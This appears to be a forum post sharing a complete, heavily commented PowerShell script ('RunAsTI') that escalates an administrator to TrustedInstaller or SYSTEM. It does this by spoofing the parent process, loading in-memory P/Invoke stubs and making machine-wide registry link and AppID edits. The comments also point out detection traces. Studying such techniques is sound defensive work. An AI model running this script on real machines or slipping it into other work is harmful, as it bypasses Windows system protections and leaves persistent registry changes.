Any one was look in aveyo script's lately actualy its very smart script. it make payload, run payload as administator -> run payload as TI, run user command very smart idea, look like registry / com hijacking and weird, i can say, don't use duplicate token etc etc (like other script's) Code:
<#
 The privilege escalation process is a 3-step operation:
 * Setup the Payload (and Initial Trigger)
 * Run Payload Script as Administrator
 * Run Payload Script as TI/SYSTEM
 * Start User Command Under TI/SYSTEM Privileges
 ----> Type OF COM hijacking -->
#>
# RunAsTI: run $cmd under the TrustedInstaller (or, as fallback, SYSTEM) token.
# Elevation comes from an ordinary UAC prompt (-verb runas); the caller must be an admin.
# Stages as visible below: (1) stash the payload in the caller's own registry hive,
# (2) an elevated PowerShell reads, deletes and iex's it, (3) that stage spawns a child
# PowerShell whose parent process is TrustedInstaller.exe / lsass.exe so the child gets
# that process's token, (4) the child, now at System integrity, launches $cmd.
# No token-duplication API is called anywhere; the token comes from the parent-process attribute.
# $cmd is passed to cmd.exe as a command line by design -- never feed it untrusted input.
function RunAsTI ($cmd) {
  # $sid = caller's user SID (last whitespace-separated field of `whoami /user`).
  $id='RunAsTI'; $sid=((whoami /user)-split' ')[-1]; $payload=@'
# --- payload: executed twice, first elevated (admin), then again as TI/SYSTEM ---
# $ti is true when the token carries the System mandatory integrity label (S-1-16-16384).
$ti=(whoami /groups)-like"*1-16-16384*"; $DM=[AppDomain]::CurrentDomain."DefineDynamicAssembly"(1,1)."DefineDynamicModule"(1)
# Six dynamic value types M0..M5 are built in memory (1179913 = 0x120109 = Public|SequentialLayout|
# Sealed|AutoClass|BeforeFieldInit), so no helper assembly is written to disk. M0 holds the
# P/Invoke stubs; M1..M5 are the native structs handed to CreateProcess.
$D=@(); 0..5|% {$D+=$DM."DefineType"("M$_",1179913,[ValueType])}; $I=[int32]; $P=$I.module.gettype("System.IntPtr"); $U=[uintptr]
# $D[6] = uintptr; $D[7..9] = byref forms of M4, M5 and uintptr, used for out/ref parameters.
$D+=$U; 4..6|% {$D+=$D[$_]."MakeByRefType"()}; $M=$I.module.gettype("System.Runtime.InteropServices.Marshal"); $Z=[uintptr]::size
# Parameter lists for CreateProcess (kernel32), RegOpenKeyEx and RegSetValueEx (advapi32).
$S=[string]; $F="kernel","advapi","advapi",($S,$S,$I,$I,$I,$I,$I,$S,$D[7],$D[8]),($U,$S,$I,$I,$D[9]),($U,$S,$I,$I,[byte[]],$I)
# 8214 = MethodAttributes Public|Static|PinvokeImpl; 1 = CallingConvention Winapi; 4 = CharSet.Auto.
0..2|% {$9=$D[0]."DefinePInvokeMethod"(("CreateProcess","RegOpenKeyEx","RegSetValueEx")[$_],$F[$_]+'32',8214,1,$S,$F[$_+3],1,4)}
# Field layouts: M1 = one attribute entry (attribute, size, value ptr); M2 = attribute list holding
# a single M1; M3 = STARTUPINFO; M4 = STARTUPINFOEX (M3 + lpAttributeList); M5 = PROCESS_INFORMATION.
$DF=0,($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$S,$S,$S,$I,$I,$I,$I,$I,$I,$I,$I,[int16],[int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
# Fields are named f1..fN in declaration order (6 = FieldAttributes.Public). $AveYo is assigned but never read here.
1..5|% {$k=$_; $n=1; $AveYo=1; $DF[$_]|% {$9=$D[$k]."DefineField"('f'+$n++,$_,6)}}; $T=@(); 0..5|% {$T+=$D[$_]."CreateType"()}
# $A0..$A5 are instances of M0..M5. F invokes a P/Invoke stub on M0 by name with an object[] of arguments;
# byref results are written back into that array.
0..5|% {nv "A$_" ([Activator]::CreateInstance($T[$_])) -force}; function F ($1,$2) {$T[0]."GetMethod"($1).invoke(0,$2)};
if ($ti) {
  # --- stage 3: already TI/SYSTEM. $env:A is cleared so the script text is not inherited any further.
  # SetPrivilege is an internal static on System.Diagnostics.Process located by reflection
  # (42 = BindingFlags DeclaredOnly|Static|NonPublic).
  $env:A=''; $PRIV=[uri].module.gettype("System.Diagnostics.Process")."GetMethods"(42) |? {$_.Name -eq "SetPrivilege"}
  # 2 = SE_PRIVILEGE_ENABLED for each of the four privileges used by the registry-link work below.
  "SeSecurityPrivilege","SeTakeOwnershipPrivilege","SeBackupPrivilege","SeRestorePrivilege" |% {$PRIV.Invoke(0, @("$_",2))}
  # 2147483651 = 0x80000003 = HKEY_USERS. Open HKU\S-1-5-18 (the Local System account's hive key)
  # with REG_OPTION_OPEN_LINK (8) and KEY_SET_VALUE (2); the handle comes back in $reg[4].
  $HKU=[uintptr][uint32]2147483651; $LNK=$HKU; $reg=@($HKU,"S-1-5-18",8,2,($LNK -as $D[9])); F "RegOpenKeyEx" $reg; $LNK=$reg[4]
  # SYM builds the RegSetValueEx arguments for a REG_LINK (type 6) "SymbolicLinkValue" pointing at \Registry\User\<name>.
  function SYM($1,$2){ $b=[Text.Encoding]::Unicode.GetBytes("\Registry\User\$1");@($2,"SymbolicLinkValue",0,6,[byte[]]$b,$b.Length) }
  # Repoint HKU\S-1-5-18 at the invoking user's hive (the SID segment of $key) for the duration of the run,
  # and blank the RunAs value of the Explorer AppID (restored to "Interactive User" at the end).
  # Both are machine-wide writes -- a REG_LINK under HKEY_USERS\S-1-5-18 and an AppID\...\RunAs change --
  # so they are useful audit/detection points, and they stay modified if the script dies mid-run.
  F "RegSetValueEx" (SYM $(($key-split'\\')[1]) $LNK); $EXP="HKLM:\Software\Classes\AppID\{CDCBCFCA-3CDC-436f-A4E2-0E02075250C2}"
  # If the first token of $cmd is an existing directory, Explorer is opened on it; otherwise $cmd is run via start /high /w.
  $r="explorer"; if (!$cmd) {$cmd='C:\'}; $dir=test-path -lit ((($cmd -split '^("[^"]+")|^([^\s]+)') -ne'')[0].trim('"')) -type 1
  # Start User Command Under TI/SYSTEM Level
  if (!$dir) {$r="start `"$id`" /high /w"}; sp $EXP RunAs '' -force; start cmd -args ("/q/x/d/r title $id && $r",$cmd) -wait -win 1
  # Poll (7 s) until no explorer.exe owned by S-1-5-18 remains, then undo both registry changes.
  do {sleep 7} while ((gwmi win32_process -filter 'name="explorer.exe"'|? {$_.getownersid().sid -eq "S-1-5-18"}))
  F "RegSetValueEx" (SYM ".Default" $LNK); sp $EXP RunAs "Interactive User" -force
} else {
  # --- stage 2: elevated admin. Start the TrustedInstaller service (net1 start) and grab its process;
  # lsass is the fallback, in which case the child ends up as plain SYSTEM rather than TI.
  # Detection note: `net1 start TrustedInstaller` from an interactive PowerShell is itself unusual.
  $g=0; "TrustedInstaller","lsass"|% {if (!$g) {net1 start $_ 2>&1 >$null; $g=@(get-process -name $_ -ea 0|% {$_})[0]}}
  # M calls a static Marshal method by name and parameter types. Two native buffers: one pointer-sized
  # (holds the parent process handle) and one of 4*ptr+16 bytes (the marshalled attribute list).
  function M($1,$2,$3){$M."GetMethod"($1,[type[]]$2).invoke(0,$3)}; $H=@(); $Z,(4*$Z+16)|% {$H+=M "AllocHGlobal" $I $_}
  # 131072 = 0x20000 = PROC_THREAD_ATTRIBUTE_PARENT_PROCESS: the new process is created as a child of $g and
  # inherits its token. Telemetry will show powershell.exe with TrustedInstaller.exe or lsass.exe as parent.
  M "WriteIntPtr" ($P,$P) ($H[0],$g.Handle); $A1.f1=131072; $A1.f2=$Z; $A1.f3=$H[0]; $A2.f1=$A2.f2=$A2.f3=$A2.f4=1; $A2.f6=$A1
  # STARTUPINFOEX.cb = 10*ptr+32 (112 bytes on 64-bit); lpAttributeList = marshalled copy of the M2 list.
  # $w includes EXTENDED_STARTUPINFO_PRESENT (0x00080000), without which the attribute list is ignored;
  # the remaining bits are ordinary CreateProcess creation flags.
  $A3.f1=10*$Z+32; $A4.f1=$A3; $A4.f2=$H[1]; M "StructureToPtr" ($D[2],$P,[boolean]) (($A2 -as $D[2]),$A4.f2,$false); $w=0x0E080600
  # Run PayLoad script as TI/SYSTEM
  # lpEnvironment is 0, so the child inherits this process's environment, including $env:A = this script.
  $out=@($null,"powershell -win 1 -nop -c iex `$env:A",0,0,0,$w,0,$null,$A4,$A5); F "CreateProcess" $out
}
'@; $key="Registry::HKEY_USERS\$sid\Volatile Environment"; $a1="`$id='$id';`$key='$key';"; $a2="`$cmd='$($cmd-replace"'","''")';"
  # Setup a Payload & RunAs Administrator
  # The payload is stored as a REG_MULTI_SZ (type 7) value named RunAsTI under the caller's own
  # Volatile Environment key; $cmd is embedded single-quote-escaped (' -> ''). The elevated PowerShell
  # reads the value, deletes it (rp) and iex's it, so the script text only lives in the registry briefly
  # and then in $env:A. A leftover RunAsTI value under that key means the elevated stage never ran.
  sp $key $id $($a1,$a2,$payload) -type 7 -force; $arg="$a1 `$env:A=(gi `$key).getvalue(`$id)-join''; rp `$key `$id -force; iex `$env:A"
  start powershell -args "-win 1 -nop -c $arg" -verb runas
}; RunAsTI "cmd /k whoami";